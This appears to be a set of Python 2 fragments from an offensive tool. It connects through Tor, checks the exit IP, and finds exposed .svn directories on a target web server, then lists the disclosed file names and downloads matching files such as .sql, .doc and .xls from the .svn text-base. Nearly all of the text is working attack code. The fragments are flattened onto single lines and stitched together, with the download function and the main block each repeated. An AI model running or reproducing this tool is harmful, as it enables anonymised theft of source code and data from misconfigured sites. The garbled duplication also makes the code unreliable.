def checkTor(): print "[*] Checking Tor connection..." page = http.getUrl(url="http://check.torproject.org/").read() if page and 'Congratulations' in page: print "[*] Tor is (still) your friend" return True elif page and 'Sorry' in page: print "[*] I was able to connect via HTTP but Tor doesn't seem to be working" return False else: print "[*] Something went wrong (don't really care what). Quiting..." return False
def download(base_url, regex=None, archive=False): # Downloading our init file (starting point) print "[*] Visiting: " + base_url + "/.svn/all-wcprops" page = http.getUrl(base_url + "/.svn/all-wcprops") try: items = [] # A SVN folder can manage multiple files # Reading the whole HTML page current = [] for line in page.readlines(): if line.strip() != "END": current.append(line) # We haven't found the end of our current 'item' yet, please continue else: current = [] items.append(current) print regex print "[*] Disclosed filenames (%u items found) via svn:" % len(items) for item in items: try: if regex == None or not re.search(regex, item[0].strip()): print "[*] Skipping (no regex match): " + base_url + "/" + item[0].strip() else: print "[*] Downloading: " + base_url + "/" + item[0].strip() # Also download the file if availible. One of the two should work response = http.getUrl(base_url + "/.svn/text-base/" + item[0].strip() + ".svn-base") if response.getcode() == 200: file_handler.writeDataToFile("text-base_" + item[0].strip(), response.read()) else: print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode() response = http.getUrl(base_url + "/.svn/prop-base/" + item[0].strip() + ".svn-base") if response.getcode() == 200: file_handler.writeDataToFile("prop-base_" + item[0].strip(), response.read()) else: print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode() time.sleep(0.5) # We are very nice when we are downloading data ;) except: pass # Its fine if something goes wrong, we'll just skip it if archive: # You probably want these files for your archive try: response = http.getUrl(base_url + "/.svn/all-wcprops") file_handler.writeDataToFile("all-wcprops", response.read()) except: pass try: response = http.getUrl(base_url + "/.svn/all-dir-prop-base") file_handler.writeDataToFile("all-dir-prop-base", response.read()) except: pass try: response = http.getUrl(base_url + "/.svn/all-entries") file_handler.writeDataToFile("all-entries", response.read()) except: pass except KeyboardInterrupt: print "Quiting..." quit() except Exception, e: print "[!] .svn found but an error occured while gathering the information. Quiting..." print "[!] Exception: %s" % e quit()
#Just notifying you about your current connection status tor.printConnInfo() if not confirm(): print "Aborting..." quit() #Lets fire this bad-boy up try: """ Firts we are fetching the initial directory structure (if availible) This allows us to determine what download template to use. If this is is not availible we will run every module until we found the matching template For more info on these structures look at svn_template.py """ print "[*] Visiting: " + argv[1] + "/.svn" response = http.getUrl(argv[1] + "/.svn") if response.getcode() == 404: print "[!] Bummer, the target doesn't seem to be vulnerable (got a 404 on the .svn directory). Quiting..." quit() if response.getcode() != 200: #I'm lazy so you can deal with unexpected response codes print "[?] An unexpected response was recieved. The recieved response code was '%u'" % response_code #Defautl regex of stuff we want to download regex = r"(.sql|.txt|.pdf|.doc|.xls)$" # Awesome .svn exists, lets see who want to come out and play import svn_version_x svn_version_x.test(argv[1]) svn_version_x.download(argv[1], regex)
#Just notifying you about your current connection status tor.printConnInfo() if not confirm(): print "Aborting..." quit() #Lets fire this bad-boy up try: """ Firts we are fetching the initial directory structure (if availible) This allows us to determine what download template to use. If this is is not availible we will run every module until we found the matching template For more info on these structures look at svn_template.py """ print "[*] Visiting: " + argv[1] + "/.svn" response = http.getUrl(argv[1] + "/.svn") if response.getcode() == 404: print "[!] Bummer, the target doesn't seem to be vulnerable (got a 404 on the .svn directory). Quiting..." quit() if response.getcode( ) != 200: #I'm lazy so you can deal with unexpected response codes print "[?] An unexpected response was recieved. The recieved response code was '%u'" % response_code #Defautl regex of stuff we want to download regex = r"(.sql|.txt|.pdf|.doc|.xls)$" # Awesome .svn exists, lets see who want to come out and play import svn_version_x svn_version_x.test(argv[1])
def printConnInfo(): connection = json.loads(http.getUrl('http://ifconfig.me/all.json').read()) print "[*] Your current connection info is: " print " IP: %s" % connection["ip_addr"] print " User-Agent: %s" % connection["user_agent"]
def download(base_url, regex=None, archive=False): # Downloading our init file (starting point) print "[*] Visiting: " + base_url + "/.svn/all-wcprops" page = http.getUrl(base_url + "/.svn/all-wcprops") try: items = [] # A SVN folder can manage multiple files #Reading the whole HTML page current = [] for line in page.readlines(): if line.strip() != "END": current.append( line ) #We haven't found the end of our current 'item' yet, please continue else: current = [] items.append(current) print regex print "[*] Disclosed filenames (%u items found) via svn:" % len(items) for item in items: try: if regex == None or not re.search(regex, item[0].strip()): print "[*] Skipping (no regex match): " + base_url + "/" + item[ 0].strip() else: print "[*] Downloading: " + base_url + "/" + item[0].strip( ) # Also download the file if availible. One of the two should work response = http.getUrl(base_url + "/.svn/text-base/" + item[0].strip() + ".svn-base") if response.getcode() == 200: file_handler.writeDataToFile( "text-base_" + item[0].strip(), response.read()) else: print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode( ) response = http.getUrl(base_url + "/.svn/prop-base/" + item[0].strip() + ".svn-base") if response.getcode() == 200: file_handler.writeDataToFile( "prop-base_" + item[0].strip(), response.read()) else: print "An unexpected response was received (%u) please retry or fetch manually" % response.getcode( ) time.sleep( 0.5 ) # We are very nice when we are downloading data ;) except: pass #Its fine if something goes wrong, we'll just skip it if archive: #You probably want these files for your archive try: response = http.getUrl(base_url + "/.svn/all-wcprops") file_handler.writeDataToFile("all-wcprops", response.read()) except: pass try: response = http.getUrl(base_url + "/.svn/all-dir-prop-base") file_handler.writeDataToFile("all-dir-prop-base", response.read()) except: pass try: response = http.getUrl(base_url + "/.svn/all-entries") file_handler.writeDataToFile("all-entries", response.read()) except: pass except KeyboardInterrupt: print "Quiting..." quit() except Exception, e: print "[!] .svn found but an error occured while gathering the information. Quiting..." print "[!] Exception: %s" % e quit()